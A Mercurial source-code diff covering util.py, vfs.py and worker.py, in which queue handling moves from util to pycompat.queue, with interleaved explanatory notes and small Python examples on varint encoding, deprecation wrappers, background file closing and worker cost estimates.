3781 3779 while True:
3782 3780 byte = ord(readexactly(fh, 1))
3783 3781 result |= ((byte & 0x7f) << shift)
3784 3782 if not (byte & 0x80):
3785 3783 return result
3786 3784 shift += 7
3787 3785
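The two functions above target Python 2's bytes-as-str model via pycompat. A self-contained Python 3 restatement of the same scheme, useful for checking the doctest values by hand:

    import io

    def encode(value):
        out = bytearray()
        while True:
            bits = value & 0x7f
            value >>= 7
            if value:
                out.append(0x80 | bits)  # continuation bit set on non-final bytes
            else:
                out.append(bits)         # final byte has the high bit clear
                return bytes(out)

    def decode(fh):
        result = shift = 0
        while True:
            byte = fh.read(1)[0]
            result |= (byte & 0x7f) << shift
            if not byte & 0x80:
                return result
            shift += 7

    assert encode(1337) == b'\xb9\n'    # 1337 = 0b0001010_0111001
    assert decode(io.BytesIO(b'\x80\x80\x04')) == 65536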
3788 3786 ###
3789 3787 # Deprecation warnings for util.py splitting
3790 3788 ###
3791 3789
3792 3790 def _deprecatedfunc(func, version, modname=None):
3793 3791 def wrapped(*args, **kwargs):
3794 3792 fn = pycompat.sysbytes(func.__name__)
3795 3793 mn = modname or pycompat.sysbytes(func.__module__)[len('mercurial.'):]
3796 3794 msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
3797 3795 nouideprecwarn(msg, version, stacklevel=2)
3798 3796 return func(*args, **kwargs)
3799 3797 wrapped.__name__ = func.__name__
3800 3798 return wrapped
3801 3799
3802 3800 defaultdateformats = dateutil.defaultdateformats
3803 3801 extendeddateformats = dateutil.extendeddateformats
3804 3802 makedate = _deprecatedfunc(dateutil.makedate, '4.6')
3805 3803 datestr = _deprecatedfunc(dateutil.datestr, '4.6')
3806 3804 shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
3807 3805 parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
3808 3806 strdate = _deprecatedfunc(dateutil.strdate, '4.6')
3809 3807 parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
3810 3808 matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
3811 3809
3812 3810 stderr = procutil.stderr
3813 3811 stdin = procutil.stdin
3814 3812 stdout = procutil.stdout
3815 3813 explainexit = _deprecatedfunc(procutil.explainexit, '4.6',
3816 3814 modname='utils.procutil')
3817 3815 findexe = _deprecatedfunc(procutil.findexe, '4.6', modname='utils.procutil')
3818 3816 getuser = _deprecatedfunc(procutil.getuser, '4.6', modname='utils.procutil')
3819 3817 getpid = _deprecatedfunc(procutil.getpid, '4.6', modname='utils.procutil')
3820 3818 hidewindow = _deprecatedfunc(procutil.hidewindow, '4.6',
3821 3819 modname='utils.procutil')
3822 3820 popen = _deprecatedfunc(procutil.popen, '4.6', modname='utils.procutil')
3823 3821 quotecommand = _deprecatedfunc(procutil.quotecommand, '4.6',
3824 3822 modname='utils.procutil')
3825 3823 readpipe = _deprecatedfunc(procutil.readpipe, '4.6', modname='utils.procutil')
3826 3824 setbinary = _deprecatedfunc(procutil.setbinary, '4.6', modname='utils.procutil')
3827 3825 setsignalhandler = _deprecatedfunc(procutil.setsignalhandler, '4.6',
3828 3826 modname='utils.procutil')
3829 3827 shellquote = _deprecatedfunc(procutil.shellquote, '4.6',
3830 3828 modname='utils.procutil')
3831 3829 shellsplit = _deprecatedfunc(procutil.shellsplit, '4.6',
3832 3830 modname='utils.procutil')
3833 3831 spawndetached = _deprecatedfunc(procutil.spawndetached, '4.6',
3834 3832 modname='utils.procutil')
3835 3833 sshargs = _deprecatedfunc(procutil.sshargs, '4.6', modname='utils.procutil')
3836 3834 testpid = _deprecatedfunc(procutil.testpid, '4.6', modname='utils.procutil')
3837 3835 try:
3838 3836 setprocname = _deprecatedfunc(procutil.setprocname, '4.6',
3839 3837 modname='utils.procutil')
3840 3838 except AttributeError:
3841 3839 pass
3842 3840 try:
3843 3841 unblocksignal = _deprecatedfunc(procutil.unblocksignal, '4.6',
3844 3842 modname='utils.procutil')
3845 3843 except AttributeError:
3846 3844 pass
3847 3845 closefds = procutil.closefds
3848 3846 isatty = _deprecatedfunc(procutil.isatty, '4.6')
3849 3847 popen2 = _deprecatedfunc(procutil.popen2, '4.6')
3850 3848 popen3 = _deprecatedfunc(procutil.popen3, '4.6')
3851 3849 popen4 = _deprecatedfunc(procutil.popen4, '4.6')
3852 3850 pipefilter = _deprecatedfunc(procutil.pipefilter, '4.6')
3853 3851 tempfilter = _deprecatedfunc(procutil.tempfilter, '4.6')
3854 3852 filter = _deprecatedfunc(procutil.filter, '4.6')
3855 3853 mainfrozen = _deprecatedfunc(procutil.mainfrozen, '4.6')
3856 3854 hgexecutable = _deprecatedfunc(procutil.hgexecutable, '4.6')
3857 3855 isstdin = _deprecatedfunc(procutil.isstdin, '4.6')
3858 3856 isstdout = _deprecatedfunc(procutil.isstdout, '4.6')
3859 3857 shellenviron = _deprecatedfunc(procutil.shellenviron, '4.6')
3860 3858 system = _deprecatedfunc(procutil.system, '4.6')
3861 3859 gui = _deprecatedfunc(procutil.gui, '4.6')
3862 3860 hgcmd = _deprecatedfunc(procutil.hgcmd, '4.6')
3863 3861 rundetached = _deprecatedfunc(procutil.rundetached, '4.6')
3864 3862
3865 3863 binary = _deprecatedfunc(stringutil.binary, '4.6')
3866 3864 stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
3867 3865 shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
3868 3866 emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
3869 3867 email = _deprecatedfunc(stringutil.email, '4.6')
3870 3868 ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
3871 3869 escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
3872 3870 unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
3873 3871 forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
3874 3872 uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
3875 3873 wrap = _deprecatedfunc(stringutil.wrap, '4.6')
3876 3874 parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')
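The block of aliases above all follows one pattern: keep the old ``util.*`` name working while pointing callers at the new home. A minimal standalone sketch of that pattern using the stdlib ``warnings`` module (the in-tree version routes through ``nouideprecwarn`` and byte strings instead):

    import functools
    import warnings

    def deprecatedfunc(func, version, modname):
        @functools.wraps(func)
        def wrapped(*args, **kwargs):
            warnings.warn(
                "'util.%s' is deprecated (since %s), use '%s.%s'"
                % (func.__name__, version, modname, func.__name__),
                DeprecationWarning, stacklevel=2)
            return func(*args, **kwargs)
        return wrapped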
@@ -1,653 +1,653 b''
1 1 # vfs.py - Mercurial 'vfs' classes
2 2 #
3 3 # Copyright Matt Mackall <mpm@selenic.com>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7 from __future__ import absolute_import
8 8
9 9 import contextlib
10 10 import errno
11 11 import os
12 12 import shutil
13 13 import stat
14 14 import tempfile
15 15 import threading
16 16
17 17 from .i18n import _
18 18 from . import (
19 19 encoding,
20 20 error,
21 21 pathutil,
22 22 pycompat,
23 23 util,
24 24 )
25 25
26 26 def _avoidambig(path, oldstat):
27 27 """Avoid file stat ambiguity forcibly
28 28
29 29 This function copies the ``path`` file if it is owned by another
30 30 user (see issue5418 and issue5584 for detail).
31 31 """
32 32 def checkandavoid():
33 33 newstat = util.filestat.frompath(path)
34 34 # return whether file stat ambiguity is (already) avoided
35 35 return (not newstat.isambig(oldstat) or
36 36 newstat.avoidambig(path, oldstat))
37 37 if not checkandavoid():
38 38 # simply copy to change owner of path to get privilege to
39 39 # advance mtime (see issue5418)
40 40 util.rename(util.mktempcopy(path), path)
41 41 checkandavoid()
42 42
43 43 class abstractvfs(object):
44 44 """Abstract base class; cannot be instantiated"""
45 45
46 46 def __init__(self, *args, **kwargs):
47 47 '''Prevent instantiation; don't call this from subclasses.'''
48 48 raise NotImplementedError('attempted instantiating ' + str(type(self)))
49 49
50 50 def tryread(self, path):
51 51 '''gracefully return an empty string for missing files'''
52 52 try:
53 53 return self.read(path)
54 54 except IOError as inst:
55 55 if inst.errno != errno.ENOENT:
56 56 raise
57 57 return ""
58 58
59 59 def tryreadlines(self, path, mode='rb'):
60 60 '''gracefully return an empty array for missing files'''
61 61 try:
62 62 return self.readlines(path, mode=mode)
63 63 except IOError as inst:
64 64 if inst.errno != errno.ENOENT:
65 65 raise
66 66 return []
67 67
68 68 @util.propertycache
69 69 def open(self):
70 70 '''Open ``path`` file, which is relative to vfs root.
71 71
72 72 Newly created directories are marked as "not to be indexed by
73 73 the content indexing service", if ``notindexed`` is specified
74 74 for "write" mode access.
75 75 '''
76 76 return self.__call__
77 77
78 78 def read(self, path):
79 79 with self(path, 'rb') as fp:
80 80 return fp.read()
81 81
82 82 def readlines(self, path, mode='rb'):
83 83 with self(path, mode=mode) as fp:
84 84 return fp.readlines()
85 85
86 86 def write(self, path, data, backgroundclose=False, **kwargs):
87 87 with self(path, 'wb', backgroundclose=backgroundclose, **kwargs) as fp:
88 88 return fp.write(data)
89 89
90 90 def writelines(self, path, data, mode='wb', notindexed=False):
91 91 with self(path, mode=mode, notindexed=notindexed) as fp:
92 92 return fp.writelines(data)
93 93
94 94 def append(self, path, data):
95 95 with self(path, 'ab') as fp:
96 96 return fp.write(data)
97 97
98 98 def basename(self, path):
99 99 """return base element of a path (as os.path.basename would do)
100 100
101 101 This exists to allow handling of strange encoding if needed."""
102 102 return os.path.basename(path)
103 103
104 104 def chmod(self, path, mode):
105 105 return os.chmod(self.join(path), mode)
106 106
107 107 def dirname(self, path):
108 108 """return dirname element of a path (as os.path.dirname would do)
109 109
110 110 This exists to allow handling of strange encoding if needed."""
111 111 return os.path.dirname(path)
112 112
113 113 def exists(self, path=None):
114 114 return os.path.exists(self.join(path))
115 115
116 116 def fstat(self, fp):
117 117 return util.fstat(fp)
118 118
119 119 def isdir(self, path=None):
120 120 return os.path.isdir(self.join(path))
121 121
122 122 def isfile(self, path=None):
123 123 return os.path.isfile(self.join(path))
124 124
125 125 def islink(self, path=None):
126 126 return os.path.islink(self.join(path))
127 127
128 128 def isfileorlink(self, path=None):
129 129 '''return whether path is a regular file or a symlink
130 130
131 131 Unlike isfile, this doesn't follow symlinks.'''
132 132 try:
133 133 st = self.lstat(path)
134 134 except OSError:
135 135 return False
136 136 mode = st.st_mode
137 137 return stat.S_ISREG(mode) or stat.S_ISLNK(mode)
138 138
139 139 def reljoin(self, *paths):
140 140 """join various elements of a path together (as os.path.join would do)
141 141
142 142 The vfs base is not injected so that paths stay relative. This exists
143 143 to allow handling of strange encoding if needed."""
144 144 return os.path.join(*paths)
145 145
146 146 def split(self, path):
147 147 """split top-most element of a path (as os.path.split would do)
148 148
149 149 This exists to allow handling of strange encoding if needed."""
150 150 return os.path.split(path)
151 151
152 152 def lexists(self, path=None):
153 153 return os.path.lexists(self.join(path))
154 154
155 155 def lstat(self, path=None):
156 156 return os.lstat(self.join(path))
157 157
158 158 def listdir(self, path=None):
159 159 return os.listdir(self.join(path))
160 160
161 161 def makedir(self, path=None, notindexed=True):
162 162 return util.makedir(self.join(path), notindexed)
163 163
164 164 def makedirs(self, path=None, mode=None):
165 165 return util.makedirs(self.join(path), mode)
166 166
167 167 def makelock(self, info, path):
168 168 return util.makelock(info, self.join(path))
169 169
170 170 def mkdir(self, path=None):
171 171 return os.mkdir(self.join(path))
172 172
173 173 def mkstemp(self, suffix='', prefix='tmp', dir=None):
174 174 fd, name = tempfile.mkstemp(suffix=suffix, prefix=prefix,
175 175 dir=self.join(dir))
176 176 dname, fname = util.split(name)
177 177 if dir:
178 178 return fd, os.path.join(dir, fname)
179 179 else:
180 180 return fd, fname
181 181
182 182 def readdir(self, path=None, stat=None, skip=None):
183 183 return util.listdir(self.join(path), stat, skip)
184 184
185 185 def readlock(self, path):
186 186 return util.readlock(self.join(path))
187 187
188 188 def rename(self, src, dst, checkambig=False):
189 189 """Rename from src to dst
190 190
191 191 checkambig argument is used with util.filestat, and is useful
192 192 only if destination file is guarded by any lock
193 193 (e.g. repo.lock or repo.wlock).
194 194
195 195 To forcibly avoid file stat ambiguity, checkambig=True involves
196 196 copying the ``src`` file if it is owned by another user. Therefore,
197 197 use checkambig=True only in limited cases (see also issue5418 and
198 198 issue5584 for detail).
199 199 """
200 200 srcpath = self.join(src)
201 201 dstpath = self.join(dst)
202 202 oldstat = checkambig and util.filestat.frompath(dstpath)
203 203 if oldstat and oldstat.stat:
204 204 ret = util.rename(srcpath, dstpath)
205 205 _avoidambig(dstpath, oldstat)
206 206 return ret
207 207 return util.rename(srcpath, dstpath)
208 208
209 209 def readlink(self, path):
210 210 return os.readlink(self.join(path))
211 211
212 212 def removedirs(self, path=None):
213 213 """Remove a leaf directory and all empty intermediate ones
214 214 """
215 215 return util.removedirs(self.join(path))
216 216
217 217 def rmtree(self, path=None, ignore_errors=False, forcibly=False):
218 218 """Remove a directory tree recursively
219 219
220 220 If ``forcibly``, this tries to remove READ-ONLY files, too.
221 221 """
222 222 if forcibly:
223 223 def onerror(function, path, excinfo):
224 224 if function is not os.remove:
225 225 raise
226 226 # read-only files cannot be unlinked under Windows
227 227 s = os.stat(path)
228 228 if (s.st_mode & stat.S_IWRITE) != 0:
229 229 raise
230 230 os.chmod(path, stat.S_IMODE(s.st_mode) | stat.S_IWRITE)
231 231 os.remove(path)
232 232 else:
233 233 onerror = None
234 234 return shutil.rmtree(self.join(path),
235 235 ignore_errors=ignore_errors, onerror=onerror)
236 236
237 237 def setflags(self, path, l, x):
238 238 return util.setflags(self.join(path), l, x)
239 239
240 240 def stat(self, path=None):
241 241 return os.stat(self.join(path))
242 242
243 243 def unlink(self, path=None):
244 244 return util.unlink(self.join(path))
245 245
246 246 def tryunlink(self, path=None):
247 247 """Attempt to remove a file, ignoring missing file errors."""
248 248 util.tryunlink(self.join(path))
249 249
250 250 def unlinkpath(self, path=None, ignoremissing=False):
251 251 return util.unlinkpath(self.join(path), ignoremissing=ignoremissing)
252 252
253 253 def utime(self, path=None, t=None):
254 254 return os.utime(self.join(path), t)
255 255
256 256 def walk(self, path=None, onerror=None):
257 257 """Yield (dirpath, dirs, files) tuple for each directories under path
258 258
259 259 ``dirpath`` is relative to the root of this vfs. This
260 260 uses ``os.sep`` as the path separator, even if you specify a
261 261 POSIX-style ``path``.
262 262
263 263 "The root of this vfs" is represented as empty ``dirpath``.
264 264 """
265 265 root = os.path.normpath(self.join(None))
266 266 # when dirpath == root, dirpath[prefixlen:] becomes empty
267 267 # because len(dirpath) < prefixlen.
268 268 prefixlen = len(pathutil.normasprefix(root))
269 269 for dirpath, dirs, files in os.walk(self.join(path), onerror=onerror):
270 270 yield (dirpath[prefixlen:], dirs, files)
271 271
272 272 @contextlib.contextmanager
273 273 def backgroundclosing(self, ui, expectedcount=-1):
274 274 """Allow files to be closed asynchronously.
275 275
276 276 When this context manager is active, ``backgroundclose`` can be passed
277 277 to ``__call__``/``open`` to result in the file possibly being closed
278 278 asynchronously, on a background thread.
279 279 """
280 280 # Sharing backgroundfilecloser between threads is complex, and using
281 281 # multiple instances puts us at risk of running out of file descriptors,
282 282 # so only allow backgroundfilecloser to be used from the main thread.
283 283 if not isinstance(threading.currentThread(), threading._MainThread):
284 284 yield
285 285 return
286 286 vfs = getattr(self, 'vfs', self)
287 287 if getattr(vfs, '_backgroundfilecloser', None):
288 288 raise error.Abort(
289 289 _('can only have 1 active background file closer'))
290 290
291 291 with backgroundfilecloser(ui, expectedcount=expectedcount) as bfc:
292 292 try:
293 293 vfs._backgroundfilecloser = bfc
294 294 yield bfc
295 295 finally:
296 296 vfs._backgroundfilecloser = None
297 297
298 298 class vfs(abstractvfs):
299 299 '''Operate files relative to a base directory
300 300
301 301 This class is used to hide the details of COW semantics and
302 302 remote file access from higher level code.
303 303
304 304 'cacheaudited' should be enabled only if (a) vfs object is short-lived, or
305 305 (b) the base directory is managed by hg and considered sort-of append-only.
306 306 See pathutil.pathauditor() for details.
307 307 '''
308 308 def __init__(self, base, audit=True, cacheaudited=False, expandpath=False,
309 309 realpath=False):
310 310 if expandpath:
311 311 base = util.expandpath(base)
312 312 if realpath:
313 313 base = os.path.realpath(base)
314 314 self.base = base
315 315 self._audit = audit
316 316 if audit:
317 317 self.audit = pathutil.pathauditor(self.base, cached=cacheaudited)
318 318 else:
319 319 self.audit = (lambda path, mode=None: True)
320 320 self.createmode = None
321 321 self._trustnlink = None
322 322
323 323 @util.propertycache
324 324 def _cansymlink(self):
325 325 return util.checklink(self.base)
326 326
327 327 @util.propertycache
328 328 def _chmod(self):
329 329 return util.checkexec(self.base)
330 330
331 331 def _fixfilemode(self, name):
332 332 if self.createmode is None or not self._chmod:
333 333 return
334 334 os.chmod(name, self.createmode & 0o666)
335 335
336 336 def __call__(self, path, mode="r", atomictemp=False, notindexed=False,
337 337 backgroundclose=False, checkambig=False, auditpath=True):
338 338 '''Open ``path`` file, which is relative to vfs root.
339 339
340 340 Newly created directories are marked as "not to be indexed by
341 341 the content indexing service", if ``notindexed`` is specified
342 342 for "write" mode access.
343 343
344 344 If ``backgroundclose`` is passed, the file may be closed asynchronously.
345 345 It can only be used if the ``self.backgroundclosing()`` context manager
346 346 is active. This should only be specified if the following criteria hold:
347 347
348 348 1. There is a potential for writing thousands of files. Unless you
349 349 are writing thousands of files, the performance benefits of
350 350 asynchronously closing files are not realized.
351 351 2. Files are opened exactly once for the ``backgroundclosing``
352 352 active duration and are therefore free of race conditions between
353 353 closing a file on a background thread and reopening it. (If the
354 354 file were opened multiple times, there could be unflushed data
355 355 because the original file handle hasn't been flushed/closed yet.)
356 356
357 357 ``checkambig`` argument is passed to atomictempfile (valid
358 358 only for writing), and is useful only if target file is
359 359 guarded by any lock (e.g. repo.lock or repo.wlock).
360 360
361 361 To forcibly avoid file stat ambiguity, checkambig=True involves
362 362 copying the ``path`` file opened in "append" mode (e.g. for
363 363 truncation) if it is owned by another user. Therefore, use the
364 364 combination of append mode and checkambig=True only in limited
365 365 cases (see also issue5418 and issue5584 for detail).
366 366 '''
367 367 if auditpath:
368 368 if self._audit:
369 369 r = util.checkosfilename(path)
370 370 if r:
371 371 raise error.Abort("%s: %r" % (r, path))
372 372 self.audit(path, mode=mode)
373 373 f = self.join(path)
374 374
375 375 if "b" not in mode:
376 376 mode += "b" # for that other OS
377 377
378 378 nlink = -1
379 379 if mode not in ('r', 'rb'):
380 380 dirname, basename = util.split(f)
381 381 # If basename is empty, then the path is malformed because it points
382 382 # to a directory. Let the posixfile() call below raise IOError.
383 383 if basename:
384 384 if atomictemp:
385 385 util.makedirs(dirname, self.createmode, notindexed)
386 386 return util.atomictempfile(f, mode, self.createmode,
387 387 checkambig=checkambig)
388 388 try:
389 389 if 'w' in mode:
390 390 util.unlink(f)
391 391 nlink = 0
392 392 else:
393 393 # nlinks() may behave differently for files on Windows
394 394 # shares if the file is open.
395 395 with util.posixfile(f):
396 396 nlink = util.nlinks(f)
397 397 if nlink < 1:
398 398 nlink = 2 # force mktempcopy (issue1922)
399 399 except (OSError, IOError) as e:
400 400 if e.errno != errno.ENOENT:
401 401 raise
402 402 nlink = 0
403 403 util.makedirs(dirname, self.createmode, notindexed)
404 404 if nlink > 0:
405 405 if self._trustnlink is None:
406 406 self._trustnlink = nlink > 1 or util.checknlink(f)
407 407 if nlink > 1 or not self._trustnlink:
408 408 util.rename(util.mktempcopy(f), f)
409 409 fp = util.posixfile(f, mode)
410 410 if nlink == 0:
411 411 self._fixfilemode(f)
412 412
413 413 if checkambig:
414 414 if mode in ('r', 'rb'):
415 415 raise error.Abort(_('implementation error: mode %s is not'
416 416 ' valid for checkambig=True') % mode)
417 417 fp = checkambigatclosing(fp)
418 418
419 419 if (backgroundclose and
420 420 isinstance(threading.currentThread(), threading._MainThread)):
421 421 if not self._backgroundfilecloser:
422 422 raise error.Abort(_('backgroundclose can only be used when a '
423 423 'backgroundclosing context manager is active')
424 424 )
425 425
426 426 fp = delayclosedfile(fp, self._backgroundfilecloser)
427 427
428 428 return fp
429 429
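A hedged sketch of the calling pattern the docstring above describes, satisfying both criteria (many files, each opened exactly once). The base path, file names, and payload are hypothetical, and this assumes a Mercurial tree of this era on ``sys.path``:

    from mercurial import ui as uimod, vfs as vfsmod

    ui = uimod.ui.load()
    store = vfsmod.vfs('/tmp/demo-store', audit=False)
    names = ['data/%d.bin' % i for i in range(10000)]
    with store.backgroundclosing(ui, expectedcount=len(names)):
        for name in names:
            # Each file is opened exactly once while the context is active.
            with store(name, 'wb', backgroundclose=True) as fp:
                fp.write(b'payload')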
430 430 def symlink(self, src, dst):
431 431 self.audit(dst)
432 432 linkname = self.join(dst)
433 433 util.tryunlink(linkname)
434 434
435 435 util.makedirs(os.path.dirname(linkname), self.createmode)
436 436
437 437 if self._cansymlink:
438 438 try:
439 439 os.symlink(src, linkname)
440 440 except OSError as err:
441 441 raise OSError(err.errno, _('could not symlink to %r: %s') %
442 442 (src, encoding.strtolocal(err.strerror)),
443 443 linkname)
444 444 else:
445 445 self.write(dst, src)
446 446
447 447 def join(self, path, *insidef):
448 448 if path:
449 449 return os.path.join(self.base, path, *insidef)
450 450 else:
451 451 return self.base
452 452
453 453 opener = vfs
454 454
455 455 class proxyvfs(object):
456 456 def __init__(self, vfs):
457 457 self.vfs = vfs
458 458
459 459 @property
460 460 def options(self):
461 461 return self.vfs.options
462 462
463 463 @options.setter
464 464 def options(self, value):
465 465 self.vfs.options = value
466 466
467 467 class filtervfs(abstractvfs, proxyvfs):
468 468 '''Wrapper vfs for filtering filenames with a function.'''
469 469
470 470 def __init__(self, vfs, filter):
471 471 proxyvfs.__init__(self, vfs)
472 472 self._filter = filter
473 473
474 474 def __call__(self, path, *args, **kwargs):
475 475 return self.vfs(self._filter(path), *args, **kwargs)
476 476
477 477 def join(self, path, *insidef):
478 478 if path:
479 479 return self.vfs.join(self._filter(self.vfs.reljoin(path, *insidef)))
480 480 else:
481 481 return self.vfs.join(path)
482 482
483 483 filteropener = filtervfs
484 484
485 485 class readonlyvfs(abstractvfs, proxyvfs):
486 486 '''Wrapper vfs preventing any writing.'''
487 487
488 488 def __init__(self, vfs):
489 489 proxyvfs.__init__(self, vfs)
490 490
491 491 def __call__(self, path, mode='r', *args, **kw):
492 492 if mode not in ('r', 'rb'):
493 493 raise error.Abort(_('this vfs is read only'))
494 494 return self.vfs(path, mode, *args, **kw)
495 495
496 496 def join(self, path, *insidef):
497 497 return self.vfs.join(path, *insidef)
498 498
499 499 class closewrapbase(object):
500 500 """Base class of wrapper, which hooks closing
501 501
502 502 Do not instantiate outside of the vfs layer.
503 503 """
504 504 def __init__(self, fh):
505 505 object.__setattr__(self, r'_origfh', fh)
506 506
507 507 def __getattr__(self, attr):
508 508 return getattr(self._origfh, attr)
509 509
510 510 def __setattr__(self, attr, value):
511 511 return setattr(self._origfh, attr, value)
512 512
513 513 def __delattr__(self, attr):
514 514 return delattr(self._origfh, attr)
515 515
516 516 def __enter__(self):
517 517 return self._origfh.__enter__()
518 518
519 519 def __exit__(self, exc_type, exc_value, exc_tb):
520 520 raise NotImplementedError('attempted instantiating ' + str(type(self)))
521 521
522 522 def close(self):
523 523 raise NotImplementedError('attempted instantiating ' + str(type(self)))
524 524
525 525 class delayclosedfile(closewrapbase):
526 526 """Proxy for a file object whose close is delayed.
527 527
528 528 Do not instantiate outside of the vfs layer.
529 529 """
530 530 def __init__(self, fh, closer):
531 531 super(delayclosedfile, self).__init__(fh)
532 532 object.__setattr__(self, r'_closer', closer)
533 533
534 534 def __exit__(self, exc_type, exc_value, exc_tb):
535 535 self._closer.close(self._origfh)
536 536
537 537 def close(self):
538 538 self._closer.close(self._origfh)
539 539
540 540 class backgroundfilecloser(object):
541 541 """Coordinates background closing of file handles on multiple threads."""
542 542 def __init__(self, ui, expectedcount=-1):
543 543 self._running = False
544 544 self._entered = False
545 545 self._threads = []
546 546 self._threadexception = None
547 547
548 548 # Only Windows/NTFS has slow file closing. So only enable by default
549 549 # on that platform. But allow it to be enabled elsewhere for testing.
550 550 defaultenabled = pycompat.iswindows
551 551 enabled = ui.configbool('worker', 'backgroundclose', defaultenabled)
552 552
553 553 if not enabled:
554 554 return
555 555
556 556 # There is overhead to starting and stopping the background threads.
557 557 # Don't do background processing unless the file count is large enough
558 558 # to justify it.
559 559 minfilecount = ui.configint('worker', 'backgroundcloseminfilecount')
560 560 # FUTURE dynamically start background threads after minfilecount closes.
561 561 # (We don't currently have any callers that don't know their file count)
562 562 if expectedcount > 0 and expectedcount < minfilecount:
563 563 return
564 564
565 565 maxqueue = ui.configint('worker', 'backgroundclosemaxqueue')
566 566 threadcount = ui.configint('worker', 'backgroundclosethreadcount')
567 567
568 568 ui.debug('starting %d threads for background file closing\n' %
569 569 threadcount)
570 570
571 self._queue = util.queue(maxsize=maxqueue)
571 self._queue = pycompat.queue.Queue(maxsize=maxqueue)
572 572 self._running = True
573 573
574 574 for i in range(threadcount):
575 575 t = threading.Thread(target=self._worker, name='backgroundcloser')
576 576 self._threads.append(t)
577 577 t.start()
578 578
579 579 def __enter__(self):
580 580 self._entered = True
581 581 return self
582 582
583 583 def __exit__(self, exc_type, exc_value, exc_tb):
584 584 self._running = False
585 585
586 586 # Wait for threads to finish closing so open files don't linger for
587 587 # longer than lifetime of context manager.
588 588 for t in self._threads:
589 589 t.join()
590 590
591 591 def _worker(self):
592 592 """Main routine for worker thread."""
593 593 while True:
594 594 try:
595 595 fh = self._queue.get(block=True, timeout=0.100)
596 596 # Need to catch or the thread will terminate and
597 597 # we could orphan file descriptors.
598 598 try:
599 599 fh.close()
600 600 except Exception as e:
601 601 # Stash so can re-raise from main thread later.
602 602 self._threadexception = e
603 except util.empty:
603 except pycompat.queue.Empty:
604 604 if not self._running:
605 605 break
606 606
607 607 def close(self, fh):
608 608 """Schedule a file for closing."""
609 609 if not self._entered:
610 610 raise error.Abort(_('can only call close() when context manager '
611 611 'active'))
612 612
613 613 # If a background thread encountered an exception, raise now so we fail
614 614 # fast. Otherwise we may potentially go on for minutes until the error
615 615 # is acted on.
616 616 if self._threadexception:
617 617 e = self._threadexception
618 618 self._threadexception = None
619 619 raise e
620 620
621 621 # If we're not actively running, close synchronously.
622 622 if not self._running:
623 623 fh.close()
624 624 return
625 625
626 626 self._queue.put(fh, block=True, timeout=None)
627 627
628 628 class checkambigatclosing(closewrapbase):
629 629 """Proxy for a file object, to avoid ambiguity of file stat
630 630
631 631 See also util.filestat for detail about "ambiguity of file stat".
632 632
633 633 This proxy is useful only if the target file is guarded by any
634 634 lock (e.g. repo.lock or repo.wlock)
635 635
636 636 Do not instantiate outside of the vfs layer.
637 637 """
638 638 def __init__(self, fh):
639 639 super(checkambigatclosing, self).__init__(fh)
640 640 object.__setattr__(self, r'_oldstat', util.filestat.frompath(fh.name))
641 641
642 642 def _checkambig(self):
643 643 oldstat = self._oldstat
644 644 if oldstat.stat:
645 645 _avoidambig(self._origfh.name, oldstat)
646 646
647 647 def __exit__(self, exc_type, exc_value, exc_tb):
648 648 self._origfh.__exit__(exc_type, exc_value, exc_tb)
649 649 self._checkambig()
650 650
651 651 def close(self):
652 652 self._origfh.close()
653 653 self._checkambig()
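The two hunks above (and the two in worker.py below) are the substance of this changeset: ``util.queue``/``util.empty`` give way to ``pycompat.queue.Queue`` and ``pycompat.queue.Empty``. The pycompat module itself is not part of this diff, but the export it provides presumably reduces to a shim along these lines:

    try:
        import queue           # Python 3
    except ImportError:
        import Queue as queue  # Python 2 ships the same module, capitalized

    # Callers then use one spelling on both major versions:
    q = queue.Queue(maxsize=8)
    q.put('fh')
    try:
        while True:
            q.get(block=True, timeout=0.01)
    except queue.Empty:
        pass  # queue.Empty replaces the old util.empty alias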
@@ -1,327 +1,327 b''
1 1 # worker.py - master-slave parallelism support
2 2 #
3 3 # Copyright 2013 Facebook, Inc.
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import errno
11 11 import os
12 12 import signal
13 13 import sys
14 14 import threading
15 15 import time
16 16
17 17 from .i18n import _
18 18 from . import (
19 19 encoding,
20 20 error,
21 21 pycompat,
22 22 scmutil,
23 23 util,
24 24 )
25 25
26 26 def countcpus():
27 27 '''try to count the number of CPUs on the system'''
28 28
29 29 # posix
30 30 try:
31 31 n = int(os.sysconf(r'SC_NPROCESSORS_ONLN'))
32 32 if n > 0:
33 33 return n
34 34 except (AttributeError, ValueError):
35 35 pass
36 36
37 37 # windows
38 38 try:
39 39 n = int(encoding.environ['NUMBER_OF_PROCESSORS'])
40 40 if n > 0:
41 41 return n
42 42 except (KeyError, ValueError):
43 43 pass
44 44
45 45 return 1
46 46
47 47 def _numworkers(ui):
48 48 s = ui.config('worker', 'numcpus')
49 49 if s:
50 50 try:
51 51 n = int(s)
52 52 if n >= 1:
53 53 return n
54 54 except ValueError:
55 55 raise error.Abort(_('number of cpus must be an integer'))
56 56 return min(max(countcpus(), 4), 32)
57 57
58 58 if pycompat.isposix or pycompat.iswindows:
59 59 _startupcost = 0.01
60 60 else:
61 61 _startupcost = 1e30
62 62
63 63 def worthwhile(ui, costperop, nops):
64 64 '''try to determine whether the benefit of multiple processes can
65 65 outweigh the cost of starting them'''
66 66 linear = costperop * nops
67 67 workers = _numworkers(ui)
68 68 benefit = linear - (_startupcost * workers + linear / workers)
69 69 return benefit >= 0.15
70 70
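Plugging concrete numbers into the cost model above: with ``costperop=0.01``, ``nops=1000``, POSIX's ``_startupcost`` of 0.01 and, say, 4 workers:

    linear = 0.01 * 1000                        # 10.0s of serial work
    benefit = linear - (0.01 * 4 + linear / 4)  # 10.0 - 2.54 = 7.46
    assert benefit >= 0.15                      # parallelizing is worthwhile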
